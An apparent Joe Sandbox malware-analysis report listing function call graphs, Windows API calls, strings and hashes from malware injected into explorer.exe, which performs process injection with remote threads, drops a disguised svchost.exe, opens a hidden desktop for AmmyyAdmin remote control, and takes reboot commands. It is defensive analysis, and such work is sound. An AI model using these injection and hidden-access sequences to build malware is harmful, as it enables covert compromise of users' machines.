                            • Source File: 00000011.00000002.507716213.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_ad1000_explorer.jbxd
                            Similarity
                            • API ID: SectionUnmapView
                            • String ID:
                            • API String ID: 498011366-0
                            • Opcode ID: 32d6501c53c68f27c38dc068e71b53e8ab29af250c398eb698913e0b1c27fdf4
                            • Instruction ID: d0fdedf2d197c06f5433d41f7eda5e01eafb098587dd2c98832b735abb845bfa
                            • Opcode Fuzzy Hash: 32d6501c53c68f27c38dc068e71b53e8ab29af250c398eb698913e0b1c27fdf4
                            • Instruction Fuzzy Hash: 3711B2B4601D094BFF58FBB8989D27933E1FB18312F54402BE816C73A2EE398A818701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADB4A8 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 adb4a8-adb4ab 1 adb4b5-adb4b9 0->1 2 adb4bb-adb4c3 1->2 3 adb4c5 1->3 2->3 4 adb4ad-adb4b3 3->4 5 adb4c7 3->5 4->1 6 adb4ca-adb4d1 5->6 8 adb4dd 6->8 9 adb4d3-adb4db 6->9 8->6 10 adb4df-adb4e2 8->10 9->8 11 adb4e4-adb4f2 10->11 12 adb4f7-adb504 10->12 13 adb52e-adb549 11->13 14 adb4f4-adb4f5 11->14 26 adb51e-adb52c call adb46a 12->26 27 adb506-adb508 12->27 15 adb57a-adb57d 13->15 14->12 17 adb57f-adb580 15->17 18 adb582-adb589 15->18 19 adb561-adb565 17->19 20 adb58f-adb593 18->20 24 adb54b-adb54e 19->24 25 adb567-adb56a 19->25 22 adb595-adb5ae LoadLibraryA 20->22 23 adb5f0-adb5f9 20->23 29 adb5af-adb5b6 22->29 33 adb5fc-adb605 23->33 24->18 30 adb550 24->30 25->18 31 adb56c-adb570 25->31 26->1 32 adb50b-adb512 27->32 29->20 37 adb5b8 29->37 38 adb551-adb555 30->38 31->38 39 adb572-adb579 31->39 47 adb51c 32->47 48 adb514-adb51a 32->48 34 adb62a-adb67a VirtualProtect * 2 33->34 35 adb607-adb609 33->35 43 adb67e-adb683 34->43 41 adb61c-adb628 35->41 42 adb60b-adb61a 35->42 44 adb5ba-adb5c2 37->44 45 adb5c4-adb5cc 37->45 38->19 46 adb557-adb559 38->46 39->15 41->42 42->33 43->43 49 adb685-adb694 43->49 50 adb5ce-adb5da 44->50 45->50 46->19 51 adb55b-adb55f 46->51 47->26 47->32 48->47 54 adb5dc-adb5e3 50->54 55 adb5e5-adb5ef 50->55 51->19 51->25 54->29
                            APIs
                            • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 00ADB5A7
                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00ADB651
                            • VirtualProtect.KERNELBASE ref: 00ADB66F
                            Memory Dump Source
                            • Source File: 00000011.00000002.507949474.0000000000ADA000.00000040.80000000.00040000.00000000.sdmp, Offset: 00ADA000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_ada000_explorer.jbxd
                            Similarity
                            • API ID: ProtectVirtual$LibraryLoad
                            • String ID:
                            • API String ID: 895956442-0
                            • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                            • Instruction ID: d5065c1525cb53cd43fda4a792b103b31e97aadfc3022c03058a399f4d70babd
                            • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                            • Instruction Fuzzy Hash: 5E51673277491D8BCB24AB38AC842F4B7D1F759325B59062BC49BC3385EB68C94683A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AD34C4 Relevance: 3.2, APIs: 2, Instructions: 195COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00AD1BF8: OpenFileMappingA.KERNEL32 ref: 00AD1C0F
                              • Part of subcall function 00AD1BF8: MapViewOfFile.KERNELBASE ref: 00AD1C2E
                            • SysFreeMap.PGOCR ref: 00AD36F7
                            • SleepEx.KERNEL32 ref: 00AD3701
                            Memory Dump Source
                            • Source File: 00000011.00000002.507716213.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_ad1000_explorer.jbxd
                            Similarity
                            • API ID: File$FreeMappingOpenSleepView
                            • String ID:
                            • API String ID: 4205437007-0
                            • Opcode ID: 637a91ef820c77fc4ae356701898ae5e96c28ad7dfb0808c97baeafa411b95c7
                            • Instruction ID: 19ea5033e0feb1db689f3716d9e0fc6f8514dfcdfd20b92d833cc367ad7c894b
                            • Opcode Fuzzy Hash: 637a91ef820c77fc4ae356701898ae5e96c28ad7dfb0808c97baeafa411b95c7
                            • Instruction Fuzzy Hash: 3C51A931318A085FDF19FF68D9996EA73E1EB94310F44461AE457C73A1DF38DA058782
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AD1BF8 Relevance: 3.0, APIs: 2, Instructions: 40fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 113 ad1bf8-ad1c18 OpenFileMappingA 114 ad1c3b-ad1c48 113->114 115 ad1c1a-ad1c38 MapViewOfFile 113->115 115->114
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.507716213.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_ad1000_explorer.jbxd
                            Similarity
                            • API ID: File$MappingOpenView
                            • String ID:
                            • API String ID: 3439327939-0
                            • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                            • Instruction ID: 7b18bf2a9a5305664bd9dff53b66634e50c4acc2a9d86ffb2661c4c52b5cd6c1
                            • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                            • Instruction Fuzzy Hash: F5F01234318F4D4FAB45EF7C9C9C136B7E1EBA8202744857A985AC6265EF34C8458711
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_00579357 1 Function_00571B56 2 Function_00572A55 45 Function_0057280D 2->45 48 Function_00572808 2->48 51 Function_00572A32 2->51 3 Function_00574555 4 Function_00571154 5 Function_00572454 5->4 7 Function_0057105D 5->7 28 Function_0057106C 5->28 29 Function_0057226C 5->29 37 Function_00571011 5->37 39 Function_0057181C 5->39 42 Function_00571000 5->42 47 Function_00572208 5->47 65 Function_005711DE 5->65 72 Function_005711CB 5->72 88 Function_00571090 5->88 89 Function_0057119F 5->89 6 Function_0057905E 8 Function_0057955C 9 Function_00571F5C 10 Function_00573A5A 11 Function_00578A59 12 Function_00571C58 13 Function_00579344 14 Function_00578F42 15 Function_00572340 22 Function_00571276 15->22 36 Function_00571912 15->36 86 Function_00571F96 15->86 16 Function_0057214E 17 Function_0057104C 18 Function_00578C49 19 Function_00571048 20 Function_00572777 20->37 21 Function_00579276 23 Function_00574675 24 Function_00572171 25 Function_00572766 25->42 26 Function_00571364 27 Function_00579462 38 Function_0057201D 29->38 54 Function_00571238 29->54 81 Function_00571CEF 29->81 29->88 30 Function_0057896A 31 Function_00579069 32 Function_00579116 33 Function_00579B14 34 Function_00571314 34->42 35 Function_00571214 36->17 67 Function_005718DC 36->67 95 Function_0057198C 36->95 97 Function_005718B9 36->97 37->65 39->37 39->42 96 Function_005714B0 39->96 40 Function_00579601 41 Function_00579B00 43 Function_0057900F 44 Function_00571F0F 44->7 44->34 44->39 66 Function_00572ADD 45->66 46 Function_0057920C 47->2 47->37 47->42 49 Function_00574537 50 Function_00579136 52 Function_0057233F 52->22 52->36 52->86 53 Function_0057473D 54->35 55 Function_00578A23 56 Function_00579821 57 Function_00579420 58 Function_0057472E 59 Function_005791D6 60 Function_00578CD6 61 Function_00578DD2 62 Function_005746D0 63 Function_005720D0 64 Function_00578EDF 98 Function_005719AF 67->98 68 Function_005792DB 69 Function_005743C7 70 Function_005793C1 71 Function_005743CE 73 Function_005713F4 73->28 73->42 74 Function_005720F2 74->37 74->42 75 Function_00578EFF 76 Function_00578AFD 77 Function_005747FC 78 Function_005754F9 79 Function_005795F8 80 Function_005745E2 81->1 81->12 81->65 82 Function_005719EF 83 Function_005720EC 84 Function_005789E9 85 Function_00578CE9 86->9 86->42 87 Function_00574496 90 Function_00578985 91 Function_00571483 91->4 92 Function_00578C8F 93 Function_00578D8F 94 Function_0057968E 95->82 96->17 96->26 96->28 96->37 96->42 96->73 96->88 96->91 98->82 99 Function_005793AB 100 Function_005726A9 100->5 100->28 100->42 100->52 100->65 100->100

                            Executed Functions

                            Function 005726A9 Relevance: 4.6, APIs: 3, Instructions: 54nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 005711DE: VirtualQuery.KERNEL32(?,?,0000001C), ref: 005711EB
                              • Part of subcall function 00571000: GetProcessHeap.KERNEL32(00000008,?,0057134A,?,00000000,00000001,00000000,?), ref: 00571003
                              • Part of subcall function 00571000: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0057100A
                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 005726CF
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00572703
                            • NtUnmapViewOfSection.NTDLL(000000FF), ref: 0057270C
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                            • String ID:
                            • API String ID: 4050682147-0
                            • Opcode ID: c076ff6acc1fb90a9a13e00966421529807753458eaefb9559f65dbb20c3e8d1
                            • Instruction ID: 1d4f435187aa7a98c719d30c8999fc458a5af1ff18e38bc88ffced6bcc24f878
                            • Opcode Fuzzy Hash: c076ff6acc1fb90a9a13e00966421529807753458eaefb9559f65dbb20c3e8d1
                            • Instruction Fuzzy Hash: 29118E30501A52DFCB18AF75FD5CA663F68FB94351F10C418E95D8B2A2DA3589C9FB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00572454 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 172filesleepstringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00571000: GetProcessHeap.KERNEL32(00000008,?,0057134A,?,00000000,00000001,00000000,?), ref: 00571003
                              • Part of subcall function 00571000: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0057100A
                            • wsprintfA.USER32 ref: 00572484
                              • Part of subcall function 0057119F: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 005711A9
                              • Part of subcall function 0057119F: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,00572498), ref: 005711BB
                            • RtlMoveMemory.NTDLL(?,00000000,00000015), ref: 00572502
                            • GetTempPathW.KERNEL32(00000104,00000000,?,0000000F,?,?,00000000,?), ref: 0057253B
                            • GetTempFileNameW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 00572547
                            • DeleteFileW.KERNEL32(00000000,?,?,00000000,?), ref: 0057254E
                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00572557
                            • wsprintfW.USER32 ref: 005725BC
                            • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 005725F0
                            • lstrcatW.KERNEL32(00000000,\svchost.exe -debug -elevated), ref: 00572663
                              • Part of subcall function 005711DE: VirtualQuery.KERNEL32(?,?,0000001C), ref: 005711EB
                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00572621
                            • CloseHandle.KERNEL32(?), ref: 0057262B
                            • Sleep.KERNELBASE(000003E8), ref: 0057269E
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: File$CreateHeapTempwsprintf$AllocateCloseDeleteDirectoryHandleMappingMemoryMoveNameOpenPathProcessQuerySleepViewVirtualWritelstrcat
                            • String ID: %s%s$%s\%s$\svchost.exe -debug -elevated$runhtv
                            • API String ID: 364369146-1656551021
                            • Opcode ID: e7f3ff9988ff9d799cae8a4950b19c2a55905585e4e02e597821dc6d3e74f248
                            • Instruction ID: 69827b834c1fdda36602bf0b76eed4ce16448f3f62e27e1143ef3db480279840
                            • Opcode Fuzzy Hash: e7f3ff9988ff9d799cae8a4950b19c2a55905585e4e02e597821dc6d3e74f248
                            • Instruction Fuzzy Hash: 6051B170204742ABC714AF24EC8DB2E7FA5BF84340F00891DF69D5B292EB709948AB56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00579B14 Relevance: 6.3, APIs: 4, Instructions: 284COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 56 579b14-579b1f 57 579b20-579b26 56->57 58 579b82-579b83 57->58 59 579b29-579b36 57->59 62 579b85 58->62 63 579b89-579b95 58->63 60 579abe-579afe 59->60 61 579b39-579b3e 59->61 64 579b75-579b77 61->64 65 579b3f 61->65 67 579b87 62->67 68 579b4e-579b50 62->68 69 579d5d 63->69 70 579b9b-579ba8 63->70 74 579bec 64->74 75 579b78 64->75 65->64 72 579b41-579b4a 65->72 67->63 68->65 73 579b51 68->73 69->69 71 579bba-579bbf 70->71 76 579bc1 71->76 72->68 73->65 77 579b53-579b69 73->77 80 579bf6 74->80 81 579bee-579bf4 74->81 78 579bcc-579bd1 75->78 79 579b79-579b7c 75->79 82 579bc3 76->82 83 579bb0-579bb5 76->83 77->57 84 579b6b-579b74 77->84 85 579bd3-579bd7 78->85 79->58 87 579bf8-579bfa 80->87 81->80 86 579c6a-579c6d 81->86 92 579bc8-579bca 82->92 90 579bb6-579bb8 83->90 84->64 85->92 93 579bd9 85->93 91 579c72-579c75 86->91 88 579c03-579c07 87->88 89 579bfc-579c01 87->89 94 579c10-579c12 88->94 95 579c09-579c0e 88->95 89->88 90->71 90->76 96 579c77-579c79 91->96 92->78 92->85 97 579be4-579be9 93->97 98 579bdb-579be2 93->98 100 579c34-579c43 94->100 101 579c14 94->101 95->94 96->91 99 579c7b-579c7e 96->99 97->87 102 579beb 97->102 98->92 98->97 99->91 103 579c80-579c9c 99->103 105 579c45-579c4c 100->105 106 579c54-579c61 100->106 104 579c15-579c17 101->104 102->74 103->96 107 579c9e 103->107 108 579c20-579c24 104->108 109 579c19-579c1e 104->109 105->105 110 579c4e 105->110 106->106 111 579c63-579c65 106->111 112 579ca4-579ca8 107->112 108->104 113 579c26 108->113 109->108 110->90 111->90 114 579cef-579cf2 112->114 115 579caa-579cc0 LoadLibraryA 112->115 116 579c31 113->116 117 579c28-579c2f 113->117 119 579cf5-579cfc 114->119 118 579cc1-579cc6 115->118 116->100 117->104 117->116 118->112 122 579cc8-579cca 118->122 120 579d20-579d50 VirtualProtect * 2 119->120 121 579cfe-579d00 119->121 125 579d54-579d58 120->125 123 579d13-579d1e 121->123 124 579d02-579d11 121->124 126 579cd3-579ce0 GetProcAddress 122->126 127 579ccc-579cd2 122->127 123->124 124->119 125->125 128 579d5a 125->128 129 579ce2-579ce7 126->129 130 579ce9-579cec 126->130 127->126 128->69 129->118
                            Memory Dump Source
                            • Source File: 00000014.00000002.508008751.0000000000578000.00000040.80000000.00040000.00000000.sdmp, Offset: 00578000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_578000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3a5a135f5fc61fd3ac64a686e6e7735035a0d648545e3caad7407c1b6cd7ce3e
                            • Instruction ID: 7c6e74cfb3f6954d87ed34c2b4230eb6cf5705602e5d7ea6b5bd4f1a5e2be231
                            • Opcode Fuzzy Hash: 3a5a135f5fc61fd3ac64a686e6e7735035a0d648545e3caad7407c1b6cd7ce3e
                            • Instruction Fuzzy Hash: F0816D715593424FDB229A38FC806B1BFA5FB52320B288669D5DEC72C3E7545C06E7B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0057119F Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 156 57119f-5711b1 OpenFileMappingA 157 5711c6-5711ca 156->157 158 5711b3-5711c3 MapViewOfFile 156->158 158->157
                            APIs
                            • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 005711A9
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,00572498), ref: 005711BB
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: File$MappingOpenView
                            • String ID:
                            • API String ID: 3439327939-0
                            • Opcode ID: dfcaeefc5ce811ca55a193bdaf5cd52849ef2029d13ecaed7ff19f2fe8122c30
                            • Instruction ID: cb4afd6feceb715ee0c2b82bedd7eaa173f0584bf531267fe348f3149967da23
                            • Opcode Fuzzy Hash: dfcaeefc5ce811ca55a193bdaf5cd52849ef2029d13ecaed7ff19f2fe8122c30
                            • Instruction Fuzzy Hash: 49D0E222705221ABE6301EBA7C0CF836EDDEF96AE1B014125B60DDA190D6608800D6B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 005711CB Relevance: 3.0, APIs: 2, Instructions: 8fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 159 5711cb-5711dd UnmapViewOfFile FindCloseChangeNotification
                            APIs
                            • UnmapViewOfFile.KERNEL32(00000000,?,00572699), ref: 005711CF
                            • FindCloseChangeNotification.KERNELBASE(?,?,00572699), ref: 005711D6
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: ChangeCloseFileFindNotificationUnmapView
                            • String ID:
                            • API String ID: 943506614-0
                            • Opcode ID: 91de1e37af62b07d09249203a724bc62e089116c047009f352931a2fdf3b172a
                            • Instruction ID: 8f584562e57d44d41f550a6a551fb9fedf417493887b5914dcd8f0110e39a677
                            • Opcode Fuzzy Hash: 91de1e37af62b07d09249203a724bc62e089116c047009f352931a2fdf3b172a
                            • Instruction Fuzzy Hash: E0B01232005430DB871527747C0C9DB3E58FE592213090344F20D8601047240886FEE5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00571000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 160 571000-571010 GetProcessHeap RtlAllocateHeap
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?,0057134A,?,00000000,00000001,00000000,?), ref: 00571003
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0057100A
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID:
                            • API String ID: 1357844191-0
                            • Opcode ID: 315dbde4521ef445818aead2d2f66f2fc0c3fe1dcc3446a7f5f49100d96c4694
                            • Instruction ID: 0937cfc9725c7f6de5d3b96adc6626f7ed1bee81d8898818d52400e883a2421f
                            • Opcode Fuzzy Hash: 315dbde4521ef445818aead2d2f66f2fc0c3fe1dcc3446a7f5f49100d96c4694
                            • Instruction Fuzzy Hash: D3A002B56911005FDD4557A5BE0DA153959EB55701F004544734D8D0509B645548FF25
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 00571CEF Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 184injectionsleepnativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 005711DE: VirtualQuery.KERNEL32(?,?,0000001C), ref: 005711EB
                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,00000000,00000000,?), ref: 00571D24
                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00571DCC
                            • RtlMoveMemory.NTDLL(00000000,005743D8,00000016), ref: 00571DF3
                            • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00571E1B
                            • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00571E2B
                            • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 00571E3A
                            • GetLastError.KERNEL32 ref: 00571E42
                            • CloseHandle.KERNEL32(00000000), ref: 00571E50
                            • Sleep.KERNEL32(000003E8), ref: 00571E57
                            • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00571E6D
                            • GetProcAddress.KERNEL32(00000000), ref: 00571E74
                            • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00571E8A
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00571EB4
                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00571EC7
                            • CloseHandle.KERNEL32(00000000), ref: 00571ECE
                            • Sleep.KERNEL32(000001F4), ref: 00571ED5
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00571EE9
                            • CloseHandle.KERNEL32(00000000), ref: 00571EF4
                            • CloseHandle.KERNEL32(?), ref: 00571EFA
                            • CloseHandle.KERNEL32(?), ref: 00571F00
                            • CloseHandle.KERNEL32(00000000), ref: 00571F03
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Handle$Close$Memory$Process$CreateMoveSectionSleepUnmapViewWrite$AddressErrorLastModuleMutexOpenProcQueryReadRemoteThreadVirtual
                            • String ID: atan$ntdll$opera_shared_counter
                            • API String ID: 1287803545-2737717697
                            • Opcode ID: 26bd03fe15fadf429d53411a5e301c16aefa1536b1f3464339ebdeb12a9cb1b3
                            • Instruction ID: 4ae459e963d38bf8538534a7ffeb20d129d41e35748029908de19b62f99c38b2
                            • Opcode Fuzzy Hash: 26bd03fe15fadf429d53411a5e301c16aefa1536b1f3464339ebdeb12a9cb1b3
                            • Instruction Fuzzy Hash: AB519931204705AFD300DF69EC88E6BBBADFB98350F004519F94DD7291DB60DD48ABA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00572171 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 52shutdownCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 602 572171-57218a StrStrIW 603 5721c0-5721cc StrStrIW 602->603 604 57218c-5721b5 RtlZeroMemory ShellExecuteExW 602->604 606 5721f5-5721f8 603->606 607 5721ce-5721e4 RtlAdjustPrivilege 603->607 605 5721bb-5721be 604->605 608 572201-572205 605->608 606->608 607->605 609 5721e6-5721f3 ExitWindowsEx 607->609 609->605
                            APIs
                            • StrStrIW.SHLWAPI(?,run.exe), ref: 00572186
                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 00572194
                            • ShellExecuteExW.SHELL32(?), ref: 005721B5
                            • StrStrIW.SHLWAPI(?,reboot.exe), ref: 005721C8
                            • RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 005721DC
                            • ExitWindowsEx.USER32(00000006,00020000), ref: 005721ED
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: AdjustExecuteExitMemoryPrivilegeShellWindowsZero
                            • String ID: open$reboot.exe$run.exe
                            • API String ID: 3582748089-806815163
                            • Opcode ID: b8459474fd6ed6bd1db2ac4faa46335b02e77a2e338e02f8a00a4efc3e853e3a
                            • Instruction ID: ce532ef2455238d4724da4e3fd2f1024bdce7a0ec2dee021447a56f03e87916b
                            • Opcode Fuzzy Hash: b8459474fd6ed6bd1db2ac4faa46335b02e77a2e338e02f8a00a4efc3e853e3a
                            • Instruction Fuzzy Hash: E0112A75940218FADB10AFA5FC49FDA7FA8BB18750F008011BE19EA1A1D7709658FFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0057226C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 66threadprocessCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00571238: FindWindowA.USER32(AmmyyAdmin3Main,00000000), ref: 00571246
                              • Part of subcall function 00571238: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00571259
                            • CreateDesktopW.USER32(00000000,00000000,00000000,10000000,00000000,00000010), ref: 00572289
                            • SetThreadDesktop.USER32(00000000), ref: 00572298
                            • RtlZeroMemory.NTDLL(?,00000044), ref: 005722A5
                            • RtlZeroMemory.NTDLL ref: 005722C3
                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 005722DC
                              • Part of subcall function 0057201D: WriteProcessMemory.KERNEL32(?,0040889C,?,00000001,00000000), ref: 00572043
                              • Part of subcall function 0057201D: WriteProcessMemory.KERNEL32(?,004579F0,?,00000001,00000000), ref: 00572057
                              • Part of subcall function 0057201D: WriteProcessMemory.KERNEL32(?,0044A2C2,?,00000001,00000000), ref: 0057206B
                              • Part of subcall function 0057201D: WriteProcessMemory.KERNEL32(?,00449F61,?), ref: 00572087
                              • Part of subcall function 0057201D: WriteProcessMemory.KERNEL32(?,00449F86,?,00000002,00000000), ref: 0057209E
                              • Part of subcall function 0057201D: WriteProcessMemory.KERNEL32(?,0045CE34,00000003,00000001,00000000), ref: 005720B2
                              • Part of subcall function 0057201D: WriteProcessMemory.KERNEL32(?,00451F52,?,00000001,00000000), ref: 005720C6
                              • Part of subcall function 00571CEF: OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,00000000,00000000,?), ref: 00571D24
                              • Part of subcall function 00571CEF: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00571DCC
                              • Part of subcall function 00571CEF: RtlMoveMemory.NTDLL(00000000,005743D8,00000016), ref: 00571DF3
                              • Part of subcall function 00571CEF: RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00571E1B
                              • Part of subcall function 00571CEF: NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00571E2B
                            • ResumeThread.KERNEL32(?,?,00000004,?,?,?,00000010), ref: 00572333
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Memory$Process$Write$Thread$CreateDesktopMoveSectionUnmapViewWindowZero$FindOpenResume
                            • String ID: D
                            • API String ID: 1435540535-2746444292
                            • Opcode ID: 74afb1ab8e23956fbed09e6dc267d138007d37ad8ac2aa4dc12e7fa0a549cc60
                            • Instruction ID: 805aff41a32fa878ce53dc9d752e1b41ceb75652cb82f6706b2983833962470a
                            • Opcode Fuzzy Hash: 74afb1ab8e23956fbed09e6dc267d138007d37ad8ac2aa4dc12e7fa0a549cc60
                            • Instruction Fuzzy Hash: B3116735104209EBC200AFA6FC4DF6B7FADFB95344F018918B64E86161CB36A58CBB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0057233F Relevance: 36.8, APIs: 12, Strings: 9, Instructions: 79libraryloadersleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00571276: GetCurrentProcessId.KERNEL32 ref: 00571288
                              • Part of subcall function 00571276: GetCurrentThreadId.KERNEL32 ref: 00571290
                              • Part of subcall function 00571276: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 005712A0
                              • Part of subcall function 00571276: Thread32First.KERNEL32(00000000,0000001C), ref: 005712AE
                              • Part of subcall function 00571276: CloseHandle.KERNEL32(00000000), ref: 00571307
                            • LoadLibraryA.KERNEL32(user32.dll), ref: 0057235B
                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0057238D
                            • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 005723A6
                            • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 005723BF
                            • GetProcAddress.KERNEL32(00000000,SystemParametersInfoW), ref: 00572374
